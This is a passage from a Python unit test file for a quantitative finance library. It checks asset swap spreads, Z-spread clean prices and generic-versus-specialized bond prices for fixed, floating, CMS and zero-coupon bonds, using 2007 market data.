100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
self.assertFalse(error5>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market asset swap spread: " + str(cmsBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(100*cmsBondParAssetSwapSpread1/cmsBondMktFullPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondMktPrice2 = 94.08 ## market price observed on 7th June 2007
cmsBondMktFullPrice2 = cmsBondMktPrice2+cmsBond2.accruedAmount()
cmsBondParAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondParAssetSwap2.setPricingEngine(swapEngine)
cmsBondParAssetSwapSpread2 = cmsBondParAssetSwap2.fairSpread()
cmsBondMktAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
cmsBondMktAssetSwap2.setPricingEngine(swapEngine)
cmsBondMktAssetSwapSpread2 = cmsBondMktAssetSwap2.fairSpread()
error6 = abs(cmsBondMktAssetSwapSpread2-
100*cmsBondParAssetSwapSpread2/cmsBondMktFullPrice2)
self.assertFalse(error6>tolerance,
"wrong asset swap spreads for cms bond:"
+ "\n market asset swap spread: " + str(cmsBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(cmsBondParAssetSwapSpread2)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
## market price observed on 12th June 2007
zeroCpnBondMktPrice1 = 70.436
zeroCpnBondMktFullPrice1 = zeroCpnBondMktPrice1+zeroCpnBond1.accruedAmount()
zeroCpnBondParAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread1 = zeroCpnBondParAssetSwap1.fairSpread()
zeroCpnBondMktAssetSwap1 = AssetSwap(payFixedRate,zeroCpnBond1,
zeroCpnBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread1 = zeroCpnBondMktAssetSwap1.fairSpread()
error7 = abs(zeroCpnBondMktAssetSwapSpread1-
100*zeroCpnBondParAssetSwapSpread1/zeroCpnBondMktFullPrice1)
self.assertFalse(error7>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market asset swap spread: " + str(zeroCpnBondMktAssetSwapSpread1)
+ "\n par asset swap spread: " + str(zeroCpnBondParAssetSwapSpread1)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2,
Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
## zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
## market price observed on 12th June 2007
zeroCpnBondMktPrice2 = 35.160
zeroCpnBondMktFullPrice2 = zeroCpnBondMktPrice2+zeroCpnBond2.accruedAmount()
zeroCpnBondParAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnBondParAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondParAssetSwapSpread2 = zeroCpnBondParAssetSwap2.fairSpread()
zeroCpnBondMktAssetSwap2 = AssetSwap(payFixedRate,zeroCpnBond2,
zeroCpnBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
zeroCpnBondMktAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondMktAssetSwapSpread2 = zeroCpnBondMktAssetSwap2.fairSpread()
error8 = abs(zeroCpnBondMktAssetSwapSpread2-
100*zeroCpnBondParAssetSwapSpread2/zeroCpnBondMktFullPrice2)
self.assertFalse(error8>tolerance,
"wrong asset swap spreads for zero cpn bond:"
+ "\n market asset swap spread: " + str(zeroCpnBondMktAssetSwapSpread2)
+ "\n par asset swap spread: " + str(zeroCpnBondParAssetSwapSpread2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
def testZSpreadWithGenericBond(self) :
"""Testing clean and dirty price with null Z-spread against theoretical prices..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1, ActualActual(ActualActual.ISDA), [self.faceAmount], [0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
fixedBondImpliedValue1 = fixedBond1.cleanPrice()
fixedBondSettlementDate1 = fixedBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
fixedBondCleanPrice1 = cleanPriceFromZSpread(fixedBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, fixedBondSettlementDate1)
tolerance = 1.0e-13
error1 = abs(fixedBondImpliedValue1-fixedBondCleanPrice1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue1)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),
[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
fixedBondImpliedValue2 = fixedBond2.cleanPrice()
fixedBondSettlementDate2= fixedBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
fixedBondCleanPrice2 = cleanPriceFromZSpread(fixedBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, fixedBondSettlementDate2)
error3 = abs(fixedBondImpliedValue2-fixedBondCleanPrice2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(fixedBondImpliedValue2)
+ "\n par asset swap spread: " + str(fixedBondCleanPrice2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),Following,[fixingDays], [],[0.0056],[],[], inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondImpliedValue1 = floatingBond1.cleanPrice()
floatingBondSettlementDate1= floatingBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
floatingBondCleanPrice1 = cleanPriceFromZSpread(floatingBond1, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual,
fixedBondSettlementDate1)
error5 = abs(floatingBondImpliedValue1-floatingBondCleanPrice1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue1)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount],floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing, [fixingDays],[],[0.0025],[],[], inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2, floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondImpliedValue2 = floatingBond2.cleanPrice()
floatingBondSettlementDate2= floatingBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
floatingBondCleanPrice2 = cleanPriceFromZSpread(floatingBond2, self.yieldCurve,
self.spread, Actual365Fixed(), self.compounding, Semiannual, fixedBondSettlementDate1)
error7 = abs(floatingBondImpliedValue2-floatingBondCleanPrice2)
self.assertFalse(error7>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(floatingBondImpliedValue2)
+ "\n par asset swap spread: " + str(floatingBondCleanPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(),Following,[fixingDays],[],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondImpliedValue1 = cmsBond1.cleanPrice()
cmsBondSettlementDate1= cmsBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
cmsBondCleanPrice1 = cleanPriceFromZSpread(cmsBond1, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, cmsBondSettlementDate1)
error9 = abs(cmsBondImpliedValue1-cmsBondCleanPrice1)
self.assertFalse(error9>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue1)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice1)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondStartDate2 = Date(6,May,2005)
cmsBondMaturityDate2 = Date(6,May,2015)
cmsBondSchedule2 = Schedule(cmsBondStartDate2,
cmsBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg2 = list(CmsLeg([self.faceAmount],cmsBondSchedule2, self.swapIndex,
Thirty360(),Following,[fixingDays],[0.84],[],[],[],inArrears))
cmsbondRedemption2 = bondCalendar.adjust(cmsBondMaturityDate2, Following)
cmsBondLeg2.append(SimpleCashFlow(100.0, cmsbondRedemption2))
cmsBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate2, cmsBondStartDate2, cmsBondLeg2)
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondImpliedValue2 = cmsBond2.cleanPrice()
cmsBondSettlementDate2= cmsBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
cmsBondCleanPrice2 = cleanPriceFromZSpread(cmsBond2, self.yieldCurve, self.spread,
Actual365Fixed(), self.compounding, Annual, cmsBondSettlementDate2)
error11 = abs(cmsBondImpliedValue2-cmsBondCleanPrice2)
self.assertFalse(error11>tolerance,
"wrong clean price for fixed bond:"
+ "\n market asset swap spread: " + str(cmsBondImpliedValue2)
+ "\n par asset swap spread: " + str(cmsBondCleanPrice2)
+ "\n error: " + str(error11)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBondStartDate1 = Date(19,December,1985)
zeroCpnBondMaturityDate1 = Date(20,December,2015)
zeroCpnBondRedemption1 = bondCalendar.adjust(zeroCpnBondMaturityDate1,
Following)
zeroCpnBondLeg1 = Leg([SimpleCashFlow(100.0, zeroCpnBondRedemption1)])
zeroCpnBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate1, zeroCpnBondStartDate1, zeroCpnBondLeg1)
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue1 = zeroCpnBond1.cleanPrice()
zeroCpnBondSettlementDate1= zeroCpnBond1.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice1 = cleanPriceFromZSpread(zeroCpnBond1, self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate1)
error13 = abs(zeroCpnBondImpliedValue1-zeroCpnBondCleanPrice1)
self.assertFalse(error13>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue1)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice1)
+ "\n error: " + str(error13)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBondStartDate2 = Date(17,February,1998)
zeroCpnBondMaturityDate2 = Date(17,February,2028)
zerocpbondRedemption2 = bondCalendar.adjust(zeroCpnBondMaturityDate2, Following)
zeroCpnBondLeg2 = Leg([SimpleCashFlow(100.0, zerocpbondRedemption2)])
zeroCpnBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
zeroCpnBondMaturityDate2, zeroCpnBondStartDate2, zeroCpnBondLeg2)
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondImpliedValue2 = zeroCpnBond2.cleanPrice()
zeroCpnBondSettlementDate2= zeroCpnBond2.settlementDate()
## standard market conventions:
## bond's frequency + coumpounding and daycounter of the YieldCurve
zeroCpnBondCleanPrice2 = cleanPriceFromZSpread(zeroCpnBond2,
self.yieldCurve,
self.spread,
Actual365Fixed(),
self.compounding, Annual,
zeroCpnBondSettlementDate2)
error15 = abs(zeroCpnBondImpliedValue2-zeroCpnBondCleanPrice2)
self.assertFalse(error15>tolerance,
"wrong clean price for zero coupon bond:"
+ "\n zero cpn implied value: " + str(zeroCpnBondImpliedValue2)
+ "\n zero cpn price: " + str(zeroCpnBondCleanPrice2)
+ "\n error: " + str(error15)
+ "\n tolerance: " + str(tolerance))
def testSpecializedBondVsGenericBond(self) :
"""Testing clean and dirty prices for specialized bond against equivalent generic bond..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondStartDate1 = Date(4,January,2005)
fixedBondMaturityDate1 = Date(4,January,2037)
fixedBondSchedule1 = Schedule(fixedBondStartDate1,
fixedBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg1 = list(FixedRateLeg(fixedBondSchedule1, ActualActual(ActualActual.ISDA), [self.faceAmount],
[0.04]))
fixedbondRedemption1 = bondCalendar.adjust(fixedBondMaturityDate1, Following)
fixedBondLeg1.append(SimpleCashFlow(100.0, fixedbondRedemption1))
## generic bond
fixedBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate1, fixedBondStartDate1,
fixedBondLeg1)
bondEngine = DiscountingBondEngine(self.termStructure)
fixedBond1.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04], ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
fixedSpecializedBond1.setPricingEngine(bondEngine)
fixedBondTheoValue1 = fixedBond1.cleanPrice()
fixedSpecializedBondTheoValue1 = fixedSpecializedBond1.cleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondTheoValue1-fixedSpecializedBondTheoValue1)
self.assertFalse(error1>tolerance,
"wrong clean price for fixed bond:"
+ "\n specialized fixed rate bond's theo clean price: " + str(fixedBondTheoValue1)
+ "\n generic equivalent bond's theo clean price: " + str(fixedSpecializedBondTheoValue1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
fixedBondTheoDirty1 = fixedBondTheoValue1+fixedBond1.accruedAmount()
fixedSpecializedTheoDirty1 = fixedSpecializedBondTheoValue1+ fixedSpecializedBond1.accruedAmount()
error2 = abs(fixedBondTheoDirty1-fixedSpecializedTheoDirty1)
self.assertFalse(error2>tolerance,
"wrong dirty price for fixed bond:"
+ "\n specialized fixed rate bond's theo dirty price: " + str(fixedBondTheoDirty1)
+ "\n generic equivalent bond's theo dirty price: " + str(fixedSpecializedTheoDirty1)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondStartDate2 = Date(5,February,2005)
fixedBondMaturityDate2 = Date(5,February,2019)
fixedBondSchedule2 = Schedule(fixedBondStartDate2,
fixedBondMaturityDate2,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBondLeg2 = list(FixedRateLeg(fixedBondSchedule2, Thirty360(Thirty360.BondBasis),[self.faceAmount],[0.05]))
fixedbondRedemption2 = bondCalendar.adjust(fixedBondMaturityDate2, Following)
fixedBondLeg2.append(SimpleCashFlow(100.0, fixedbondRedemption2))
## generic bond
fixedBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
fixedBondMaturityDate2, fixedBondStartDate2, fixedBondLeg2)
fixedBond2.setPricingEngine(bondEngine)
## equivalent specialized fixed rate bond
fixedSpecializedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedSpecializedBond2.setPricingEngine(bondEngine)
fixedBondTheoValue2 = fixedBond2.cleanPrice()
fixedSpecializedBondTheoValue2 = fixedSpecializedBond2.cleanPrice()
error3 = abs(fixedBondTheoValue2-fixedSpecializedBondTheoValue2)
self.assertFalse(error3>tolerance,
"wrong clean price for fixed bond:"
+ "\n specialized fixed rate bond's theo clean price: " + str(fixedBondTheoValue2)
+ "\n generic equivalent bond's theo clean price: " + str(fixedSpecializedBondTheoValue2)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
fixedBondTheoDirty2 = fixedBondTheoValue2+ fixedBond2.accruedAmount()
fixedSpecializedBondTheoDirty2 = fixedSpecializedBondTheoValue2+ fixedSpecializedBond2.accruedAmount()
error4 = abs(fixedBondTheoDirty2-fixedSpecializedBondTheoDirty2)
self.assertFalse(error4>tolerance,
"wrong dirty price for fixed bond:"
+ "\n specialized fixed rate bond's dirty clean price: " + str(fixedBondTheoDirty2)
+ "\n generic equivalent bond's theo dirty price: " + str(fixedSpecializedBondTheoDirty2)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondStartDate1 = Date(29,September,2003)
floatingBondMaturityDate1 = Date(29,September,2013)
floatingBondSchedule1 = Schedule(floatingBondStartDate1,
floatingBondMaturityDate1,
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBondLeg1 = list(IborLeg([self.faceAmount],floatingBondSchedule1, self.iborIndex,
Actual360(),Following,[fixingDays],[],[0.0056],[],[],inArrears))
floatingbondRedemption1 = bondCalendar.adjust(floatingBondMaturityDate1, Following)
floatingBondLeg1.append(SimpleCashFlow(100.0, floatingbondRedemption1))
## generic bond
floatingBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate1, floatingBondStartDate1,
floatingBondLeg1)
floatingBond1.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[], [],
inArrears,
100.0, Date(29,September,2003))
floatingSpecializedBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondTheoValue1 = floatingBond1.cleanPrice()
floatingSpecializedBondTheoValue1 = floatingSpecializedBond1.cleanPrice()
error5 = abs(floatingBondTheoValue1-
floatingSpecializedBondTheoValue1)
self.assertFalse(error5>tolerance,
"wrong clean price for fixed bond:"
+ "\n generic fixed rate bond's theo clean price: " + str(floatingBondTheoValue1)
+ "\n equivalent specialized bond's theo clean price: " + str(floatingSpecializedBondTheoValue1)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
floatingBondTheoDirty1 = floatingBondTheoValue1+ floatingBond1.accruedAmount()
floatingSpecializedBondTheoDirty1 = floatingSpecializedBondTheoValue1 + floatingSpecializedBond1.accruedAmount()
error6 = abs(floatingBondTheoDirty1-
floatingSpecializedBondTheoDirty1)
self.assertFalse(error6>tolerance,
"wrong dirty price for frn bond:"
+ "\n generic frn bond's dirty clean price: " + str(floatingBondTheoDirty1)
+ "\n equivalent specialized bond's theo dirty price: " + str(floatingSpecializedBondTheoDirty1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondStartDate2 = Date(24,September,2004)
floatingBondMaturityDate2 = Date(24,September,2018)
floatingBondSchedule2 = Schedule(floatingBondStartDate2,
floatingBondMaturityDate2,
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBondLeg2 = list(IborLeg([self.faceAmount], floatingBondSchedule2, self.iborIndex,
Actual360(),ModifiedFollowing,[fixingDays], [],[0.0025],[],[],inArrears))
floatingbondRedemption2 = bondCalendar.adjust(floatingBondMaturityDate2, ModifiedFollowing)
floatingBondLeg2.append(SimpleCashFlow(100.0, floatingbondRedemption2))
## generic bond
floatingBond2 = Bond(settlementDays, bondCalendar, self.faceAmount,
floatingBondMaturityDate2, floatingBondStartDate2,
floatingBondLeg2)
floatingBond2.setPricingEngine(bondEngine)
## equivalent specialized floater
floatingSpecializedBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingSpecializedBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
setCouponPricer(floatingSpecializedBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
floatingBondTheoValue2 = floatingBond2.cleanPrice()
floatingSpecializedBondTheoValue2 = floatingSpecializedBond2.cleanPrice()
error7 = abs(floatingBondTheoValue2-floatingSpecializedBondTheoValue2)
self.assertFalse(error7>tolerance,
"wrong clean price for floater bond:"
+ "\n generic floater bond's theo clean price: " + str(floatingBondTheoValue2)
+ "\n equivalent specialized bond's theo clean price: " + str(floatingSpecializedBondTheoValue2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
floatingBondTheoDirty2 = floatingBondTheoValue2+ floatingBond2.accruedAmount()
floatingSpecializedTheoDirty2 = floatingSpecializedBondTheoValue2+ floatingSpecializedBond2.accruedAmount()
error8 = abs(floatingBondTheoDirty2-floatingSpecializedTheoDirty2)
self.assertFalse(error8>tolerance,
"wrong dirty price for floater bond:"
+ "\n generic floater bond's theo dirty price: " + str(floatingBondTheoDirty2)
+ "\n equivalent specialized bond's theo dirty price: " + str(floatingSpecializedTheoDirty2)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondStartDate1 = Date(22,August,2005)
cmsBondMaturityDate1 = Date(22,August,2020)
cmsBondSchedule1 = Schedule(cmsBondStartDate1,
cmsBondMaturityDate1,
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBondLeg1 = list(CmsLeg([self.faceAmount],cmsBondSchedule1, self.swapIndex,
Thirty360(), Following, [fixingDays], [],[],[0.055],[0.025],inArrears))
cmsbondRedemption1 = bondCalendar.adjust(cmsBondMaturityDate1, Following)
cmsBondLeg1.append(SimpleCashFlow(100.0, cmsbondRedemption1))
## generic cms bond
cmsBond1 = Bond(settlementDays, bondCalendar, self.faceAmount,
cmsBondMaturityDate1, cmsBondStartDate1, cmsBondLeg1)
cmsBond1.setPricingEngine(bondEngine)
## equivalent specialized cms bond
cmsSpecializedBond1 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule1,
self.swapIndex, Thirty360(),
Following, fixingDays,
[1.0], [0.0],
